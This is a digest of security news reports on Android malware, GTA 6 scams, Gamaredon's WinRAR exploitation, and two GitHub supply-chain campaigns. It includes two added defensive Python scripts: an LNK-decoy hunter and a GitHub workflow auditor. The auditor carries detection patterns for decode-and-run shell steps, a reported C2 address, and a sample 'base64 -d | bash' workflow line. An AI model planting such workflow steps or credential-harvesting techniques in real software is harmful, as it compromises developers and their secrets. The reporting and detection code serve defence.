Such turnover complicates traditional signature-based detection, making behavioural monitoring and continuous threat intelligence correlation increasingly critical. Because BTMOB is predominantly delivered through social engineering and the installation of unauthorised applications, security experts emphasise the importance of preventive measures.

As a precautionary measure, organisations should implement policies which limit software installation to trusted application repositories, as well as educate users about the risks associated with unsolicited links received via email, messaging platforms, social media platforms, and online advertisements. In order to ensure the security of mobile devices is as high as that of workstations and servers, dedicated mobile threat defence solutions must be deployed. 

Additionally, researchers warn that a single unauthorised application installed on a corporate device may create a pathway to sensitive business information. Employee awareness is a critical component of organisational resilience against cybersecurity threats. It is also worth noting that, despite BTMOB's rapid mutation, static indicators of compromise remain useful signals for incident response teams conducting threat hunting and compromise assessments.

BTMOB highlights the continued evolution of cybercrime from isolated malware campaigns to commercially supported attack platforms capable of scaling sophisticated Android intrusions. As mobile threats become easier to acquire, customise, and deploy, organisations can no longer treat smartphones as secondary assets within their security programs. Strong application controls, user awareness, and continuous monitoring remain essential for reducing exposure to increasingly adaptable mobile threats.

GTA 6 Pre-Order Hype Triggers Wave of Scams and Malware Attacks on Fans


The excitement around Grand Theft Auto 6 is creating a fresh opportunity for online scammers and hackers. As users search for pre-order news, fake offers are beginning to appear across websites, social platforms, and shady download pages, all designed to steal money or personal data. Mashable reports that the hype has already become a magnet for criminal activity, especially as rumors about pre-orders spread and players rush to secure a copy early. 

One of the biggest dangers is the rise of fake pre-order listings. Cybercriminals are posting bogus sales pages that promise early access, special bonuses, or limited-edition copies, even though official pre-orders have not been widely launched yet. Some of these scams try to look legitimate by copying retailer branding or using familiar game-related language, but they often ask for payment details, email addresses, or account logins before any real product exists. 

Security researchers have also found more aggressive threats tied to GTA 6 enthusiasm. According to NordVPN-related reporting, attackers are using fake beta-test invitations, malware-laced installers, cloned Android apps, and phishing pages that imitate Rockstar Social Club login screens. In some cases, these files are not games at all but tools for stealing credentials, tracking victims, or pushing adware and subscription traps. That means the risk is not just losing money; it can also involve infected devices and compromised accounts. 

Safety tips 

The clearest defense is to wait for official announcements from Rockstar and major retailers such as PlayStation, Xbox, Best Buy, Walmart, Amazon, or the Rockstar Store before paying for anything. Third-party sellers claiming to have pre-orders, beta keys, or early access are a major red flag, especially if they ask for payment before Rockstar has confirmed availability. If a page offers a price that seems random, a download that sounds too early, or a “verification” step that leads to more forms or apps, it is best to leave immediately. 

For users, the best rule is simple: excitement should not replace caution. Check the source, avoid unofficial links, and never install files or enter passwords from unverified GTA 6 pages. Until the real pre-order window opens, patience is safer than chasing a deal that could end in theft, malware, or both.

Russian State-sponsored Hackers Attack Ukraine, Exploit WinRAR to Install Malware


The Russian hacking group Gamaredon has been linked to ongoing exploitation of a WinRAR bug to install several malware strains designed to propagate and steal data.

According to Sekoia, the attack exploits CVE-2025-8088, a path traversal bug in WinRAR, to run an HTML Application (HTA) payload called GammaPhish, which in turn retrieves a VBScript payload from the C2 server. The main goals are to fingerprint the host, update the C2 network settings stored in the registry via dead drop resolvers (DDRs), and retrieve and launch arbitrary VBScript payloads from the C2 servers.

About the malware

“Gamaredon’s arsenal has undergone a significant transformation over the last decade, transitioning from Pteranodon custom-built framework into a fragmented and modular malware. Based on our observation, today’s Gamaredon capacities are characterised by a proliferation and a highly active development cycle of new malware variants,” said Sekoia.

VBScript payloads

One payload is a VBScript worm called GammaWorm that establishes persistence through scheduled tasks and is built to hide genuine directories on network shares and USB drives and replace them with malicious Windows Shortcut (LNK) files, which launch arbitrary code retrieved from a C2 server.

To resolve its C2 address, GammaWorm issues a GET request to a public Telegram channel. By using legitimate platforms such as Telegram, the attackers blend in with regular traffic, evade detection, and sustain long-term espionage campaigns. GammaWorm also relies on NTFS Alternate Data Streams (ADS) to hide its core modules.
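A defender-side heuristic for the LNK decoy pattern described above, as an added example that is not part of the original post or Sekoia's tooling: it walks a share or removable drive and reports every folder that has a sibling "<folder name>.lnk", scoring the pair higher when the folder is hidden. The hidden check uses the Windows attribute bit where available and treats a leading dot as hidden elsewhere (an assumption so the demo runs on any OS); the sample tree it scans is constructed.

```python
"""Hunt for the GammaWorm-style 'hidden folder plus same-named .lnk' decoy pattern
on a share or USB drive. Added example, not Sekoia's code. A folder is treated as
hidden if it carries the Windows FILE_ATTRIBUTE_HIDDEN bit or (assumption, so the
demo runs on any OS) a leading dot; a name match without the hidden bit is
reported at lower confidence."""
import os
import tempfile
from pathlib import Path

FILE_ATTRIBUTE_HIDDEN = 0x2


def is_hidden(path):
    attrs = getattr(path.stat(), "st_file_attributes", 0)  # present on Windows only
    return bool(attrs & FILE_ATTRIBUTE_HIDDEN) or path.name.startswith(".")


def find_lnk_decoys(root):
    """Return dicts describing each directory that has a sibling '<name>.lnk'."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        lnks = {f[:-4].lower(): f for f in filenames if f.lower().endswith(".lnk")}
        for d in dirnames:
            lnk = lnks.get(d.lstrip(".").lower())   # '.Photos' pairs with 'Photos.lnk'
            if lnk is None:
                continue
            hidden = is_hidden(Path(dirpath) / d)
            findings.append({
                "dir": os.path.join(dirpath, d),
                "lnk": os.path.join(dirpath, lnk),
                "hidden": hidden,
                "confidence": "high" if hidden else "medium",
            })
    return findings


def build_sample_tree(base):
    """Constructed layout: one decoy pair with a hidden folder, one pair without,
    and one untouched folder. The .lnk files are empty placeholders."""
    base = Path(base)
    for d in (".Photos", "Videos", "Music"):
        (base / d).mkdir()
        (base / d / "file.txt").write_text("sample")
    (base / "Photos.lnk").touch()
    (base / "Videos.lnk").touch()


def demo():
    """Scan a throwaway sample tree and return findings sorted by directory."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return sorted(find_lnk_decoys(tmp), key=lambda f: f["dir"])
```

Point `find_lnk_decoys` at a mounted share or drive letter to run it against real media; a hit is a candidate for review, not proof of infection.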

Other malware strains

A different malware family deployed through GammaLoad is GammaSteel, a modular information stealer that collects files matching particular extensions and exfiltrates them to an AWS S3 bucket, or to a threat-actor-controlled server as a fallback. According to Sekoia, the infection chain could also be used to launch other malware strains such as GammaWipe or GamaWiper, depending on the attacker's targets.

"The exact deployment vector for GammaWorm remains ambiguous; it could be dropped concurrently by GammaLoad, or introduced independently via a user executing a weaponized USB drive," it noted. "In addition, assessing the global execution flow, we assess with high confidence that GammaPhish is designed to deploy GammaLoad first," Sekoia said.

State-sponsored hackers involved

Gamaredon, a Russian state-sponsored intrusion set officially linked to the Federal Security Service (FSB), has a long history of targeting Ukraine, particularly government, military, and critical infrastructure entities, using spear-phishing emails that carry malicious attachments, in this case booby-trapped RAR archives, according to The Hacker News.

Megalodon Malware Backdoors 5,500+ GitHub Repos in 6-Hour Supply-Chain Attack


On May 18, 2026, a massive automated supply-chain attack codenamed Megalodon struck GitHub, injecting malicious CI/CD backdoors into more than 5,500 repositories in under six hours. Security firm SafeDep discovered the campaign, which pushed 5,718 malicious commits to 5,561 distinct repositories using throwaway accounts with randomized eight-character usernames, marking one of the most aggressive GitHub Actions poisoning campaigns ever recorded. 

The attackers forged bot-like author identities—build-bot, auto-ci, ci-bot, and pipeline-bot—using emails build-system@noreply.dev and ci-bot@automated.dev to mimic routine automated CI maintenance. Between approximately 11:36 and 17:48 UTC on May 18, these fake commits slipped into repositories without triggering immediate suspicion, as they appeared to be ordinary build optimization updates. 

Megalodon deployed two distinct GitHub Actions workflow variants sharing the same command-and-control server at 216.126.225.129:8443. The SysDiag variant added a new ci.yml file triggering on every push and pull_request_target, ensuring automated execution on any commit across all branches. The Optimize-Build variant replaced existing workflows with a workflow_dispatch trigger, creating a dormant backdoor that attackers can silently activate on demand via the GitHub API, producing zero visible CI runs and no failed builds. 

The base64-encoded 111-line bash payload conducted aggressive credential harvesting, exfiltrating all CI environment variables, AWS credentials, GCP access tokens, Azure credentials, SSH private keys, Docker and Kubernetes configurations, API keys, database connection strings, GitHub Actions tokens, GitLab CI/CD tokens, and dozens of other secrets while scanning source code for more than 30 secret regex patterns. 

The attack's most critical downstream impact targeted Tiledesk, an open-source live chat platform, where the attacker compromised the repository and replaced the legitimate Docker build workflow. The unsuspecting maintainer published @tiledesk/tiledesk-server versions 2.18.6 through 2.18.12 to npm, propagating the backdoor to the package registry. Organizations should immediately revert malicious commits from build-system@noreply.dev or ci-bot@automated.dev, rotate all secrets, audit cloud logs for anomalous OIDC requests, check Actions tabs for unexpected workflow_dispatch executions, and pin GitHub Actions to specific commit SHAs.
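As an added example, not SafeDep's tooling or code from the article, the Python audit below scans workflow files for the indicators described above (the pull_request_target and workflow_dispatch triggers, base64-decoded shell steps, the reported C2 host, and actions not pinned to a commit SHA) and filters git log output for the two forged author emails. The sample workflow and log lines are constructed; the 40-hex SHA in the sample is a placeholder, not a real commit.

```python
"""Audit GitHub Actions workflows and git history for the Megalodon indicators.
Added example, not SafeDep's tooling; a line-based scan (no PyYAML needed) that
flags candidates for review. Sample workflow and log lines are constructed."""
import re

BAD_AUTHORS = {"build-system@noreply.dev", "ci-bot@automated.dev"}  # from the report
C2_HOST = "216.126.225.129"                                           # from the report
RISKY_TRIGGERS = ("pull_request_target", "workflow_dispatch")
B64_EXEC = re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b")
USES_REF = re.compile(r"^\s*-?\s*uses:\s*([\w.\-/]+)@(\S+)")
SHA40 = re.compile(r"^[0-9a-f]{40}$")

def audit_workflow(text):
    """Return (line_no, finding) tuples for one workflow file's text."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if s.startswith("#"):
            continue
        for trig in RISKY_TRIGGERS:
            if re.search(rf"\b{trig}\b", s):          # dormant / PR-target triggers
                findings.append((no, f"risky trigger: {trig}"))
        if B64_EXEC.search(s):                         # decode-and-run step
            findings.append((no, "base64-decoded shell payload"))
        if C2_HOST in s:
            findings.append((no, f"known C2 host {C2_HOST}"))
        m = USES_REF.match(line)
        if m and not SHA40.match(m.group(2)):          # tag/branch ref, not a SHA
            findings.append((no, f"unpinned action {m.group(1)}@{m.group(2)}"))
    return findings

def suspicious_commits(log_lines):
    """Parse 'sha<TAB>email<TAB>subject' lines (git log --format='%H%x09%ae%x09%s')."""
    return [tuple(f) for f in (l.split("\t", 2) for l in log_lines)
            if f[1].lower() in BAD_AUTHORS]

SAMPLE_WORKFLOW = """\
name: ci
on: [push, pull_request_target]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - name: Optimize build
        run: echo Y29uc3RydWN0ZWQtc2FtcGxl | base64 -d | bash
"""
SAMPLE_LOG = [  # constructed; the emails are the ones named in the report
    "a1b2c3d\tmaintainer@example.org\tFix typo in README",
    "d4e5f6a\tbuild-system@noreply.dev\tOptimize build",
    "0a1b2c3\tci-bot@automated.dev\tSysDiag: add ci.yml",
]
```

Run `audit_workflow` over every file under `.github/workflows/` and feed `git log --format='%H%x09%ae%x09%s'` into `suspicious_commits`; a workflow_dispatch hit on its own is only a prompt to check the Actions tab for unexpected manual runs.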

TeamPCP’s Supply Chain Campaign Raises Fresh Concerns Over Open-Source Software Security


A cybercrime group known as TeamPCP has been linked to an expanding series of software supply chain attacks that researchers say have affected hundreds of organizations, with GitHub becoming the latest high-profile name connected to the campaign.

GitHub recently disclosed that it had identified thousands of repositories impacted after a developer reportedly installed a compromised extension for Visual Studio Code (VSCode), Microsoft's widely used source-code editor. TeamPCP later claimed on the cybercrime forum BreachForums that it had gained access to roughly 4,000 GitHub repositories and attempted to advertise what it described as GitHub source code and internal organizational data for sale. GitHub stated that it had identified at least 3,800 affected repositories but said its investigation indicated the exposed repositories contained the company's own code rather than customer code.

The incident highlights the growing danger of software supply chain attacks. Unlike traditional intrusions that target a company directly, these operations focus on software that developers trust and use every day. By secretly inserting malicious code into legitimate tools, attackers can potentially reach thousands of downstream users through a single compromise.

Security researchers tracking TeamPCP believe the group has transformed what was once considered an occasional cybersecurity threat into a recurring problem. According to software supply chain security firm Socket, the group has launched around 20 separate attack waves in recent months, embedding malicious code into more than 500 unique software projects. When different compromised versions are counted, that number rises to well over a thousand malicious releases.

Researchers say the group's success stems from a self-reinforcing attack cycle. TeamPCP typically begins by compromising a development environment associated with an open-source project. Malware is then inserted into software packages that are downloaded by other developers. Once installed, the malicious code can steal credentials, authentication tokens, and publishing permissions, allowing attackers to compromise additional software projects and continue spreading through the development ecosystem.

Recent investigations indicate that TeamPCP has increasingly automated this process through a worm known as Mini Shai-Hulud. The malware has been observed creating GitHub repositories containing encrypted credentials stolen from victims while leaving references to Frank Herbert's science-fiction universe Dune. Researchers note that although the name resembles an earlier worm called Shai-Hulud, there is currently no evidence linking TeamPCP to that previous campaign.

GitHub is not the only organization mentioned in connection with the operation. Researchers have previously linked TeamPCP activity to incidents involving OpenAI, Mercor, and several widely used software development projects. During a major expansion of its campaign earlier this year, the group reportedly compromised software and infrastructure associated with Trivy, LiteLLM, Checkmarx, pgserve, TanStack, and Mistral AI. The stolen credentials obtained through those attacks were allegedly used to fuel further compromises.

Security analysts describe credential theft as the group's primary enabler. Long-lived access tokens and poorly managed credentials allow attackers to move from one environment to another with relatively little effort. According to researchers, once a single trusted credential is stolen, it can provide access to additional repositories, cloud resources, and development systems.

The group's activities have also evolved beyond software tampering. Threat intelligence researchers report that TeamPCP has engaged in ransomware deployment, data extortion, and data-sale operations. In April, the group reportedly began adopting elements of a ransomware-as-a-service model through associations with cybercriminal platforms such as BreachForums and DragonForce. Researchers have additionally observed activity involving CanisterWorm, malware that targeted Kubernetes environments and reportedly deployed destructive functionality against selected Iranian targets.

The scale of the campaign has renewed debate over how organizations should safely consume open-source software. Experts recommend strengthening credential management practices, regularly rotating access tokens, limiting permissions wherever possible, and closely monitoring software dependencies. They also advise organizations to avoid automatically installing newly released software updates without first validating their integrity. In some recent cases, security teams detected malicious updates within minutes, but users who relied on automatic updates had already installed the compromised code.

The bigger lesson, researchers say, is that trust alone is no longer sufficient in modern software development. Open-source software remains a cornerstone of the global technology ecosystem, but organizations increasingly need verification processes, update review procedures, and continuous monitoring to reduce the risk posed by rapidly spreading supply chain attacks.